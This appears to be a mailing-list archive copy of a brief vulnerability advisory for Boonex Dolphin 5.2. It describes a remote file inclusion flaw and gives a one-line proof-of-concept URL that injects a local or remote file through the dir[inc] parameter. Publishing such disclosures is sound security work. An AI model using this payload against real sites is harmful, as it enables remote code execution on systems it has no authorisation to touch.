Boonex Dolphin 5.2 Remote File Inclusion

[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

 

/****************************************/

http://www.w4cking.com

CREDIT:
w4ck1ng.com

PRODUCT:
Boonex Dolphin 5.2
http://www.boonex.com/products/dolphin/

VULNERABILITY:
Remote File Inclusion

NOTES:
- requires register globals on
- requires magic quotes off

POC:
<host>/<path>/templates/tmpl_dfl/scripts/index.php?dir[inc]=<local/remotefile>

ADVISORY & EXPLOIT (requires registration):
http://w4ck1ng.com/board/showthread.php?t=1490

/****************************************/
[Index of Archives]     [Linux Security]     [Netfilter]     [PHP]     [Yosemite News]     [Linux Kernel]

  Powered by Linux